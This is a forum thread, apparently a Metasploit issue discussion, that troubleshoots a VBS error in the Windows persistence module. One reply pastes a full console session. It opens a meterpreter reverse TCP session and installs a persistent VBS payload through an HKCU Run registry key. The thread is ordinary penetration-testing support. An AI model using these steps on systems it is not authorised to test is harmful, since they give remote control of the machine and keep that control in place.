persistence script vbs cannot run on x64?

[kdlsw]

Hello everyone,
With Kali, I just built an exe file with msfvenom, with payload windows/x64/meterpreter/reverse_tcp, and listen with multi/handler, the same payload, it all works fine, the target is a win7 x64 VPS.

The problem came when I tried to run persistence script, the target machine shows some VB warnings, briefly "the program is a 16 bit program, and the system is 64 bit, so it will stop, please contact the program supplier for a x64 edition", this the same massage appears when every time login too (I give the -X or -U flag).

I then tried this https://github.com/rapid7/metasploit-framework/blob/ee07809fd83f87d4cfc75525739820d1a87e2dfb/scripts/meterpreter/persistence.rb, result is the same.

I am not sure which part went wrong, please, any suggestion will be appreciated. Thank you!

[void-in]

Can you try modules/exploits/windows/local/persistence.rb? The meterpreter scripts are not managed any more.

[kdlsw]

Ok, I just tested it, there is the same error, after I click "OK" on the pop window, it shows another warning from windows script Host,
Script:
C:\Users\Administrator\AppData\Local\Temp\pkzsdfSFS.vbs
line: 21
character: 2
error: 0x800700D8
source: (null)

is there any succeed example command code? I am worrying if I did some misconfiguration.

[void-in]

I couldn't reproduce this at my end. Target machine Windows 7, latest Metasploit git checkout:

msf exploit(handler) > exploit

[*] Started reverse TCP handler on x.x.x.x:443
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to y.y.y.y
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:65197) at 2016-05-24 09:48:58 +0500

meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : en_US
Domain          : MSF
Logged On Users : 1
Meterpreter     : x64/win64

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/persistence
msf exploit(persistence) > show options

Module options (exploit/windows/local/persistence):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DELAY     10               yes       Delay (in seconds) for persistent payload to keep reconnecting back.
   EXE_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   PATH                       no        Path to write payload (%TEMP% by default).
   REG_NAME                   no        The name to call registry value for persistence on target host (%RAND% by default).
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)
   VBS_NAME                   no        The filename to use for the VBS persistent script on the target host (%RAND% by default).


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(persistence) > set SESSION 1
SESSION => 1
msf exploit(persistence) > exploit

[*] Running persistent module against TEST via session ID: 1
[+] Persistent VBS script written on TEST to C:\Users\MSF\AppData\Local\Temp\ytHMQvsCXmUN.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xeIwIRsvhAkUN
[+] Installed autorun on TEST as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xeIwIRsvhAkUN
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/TEST_20160524.4950/TEST_20160524.4950.rc
msf exploit(persistence) > sessions -i 1
[*] Starting interaction with 1...

msf exploit(persistence) >

[kdlsw]

@void-in Thank you very much for testing it out, unfortunately I still cannot spot any problem on my end. If it is possible, do you mind to send me a copy of your peresitence.rb under your exploit/windows/local/ database please? cause all other steps seem identical, I modified my persistence.rb for a few times, then switched back to the original version, but cant be too sure about that. Lot of Thanks

[void-in]

I am using the one in the msf tree. You can examine it at https://github.com/rapid7/metasploit-framework/blob/05680ab6f30d6a8437ac1a8be6d9110764bbc725/modules/exploits/windows/local/persistence.rb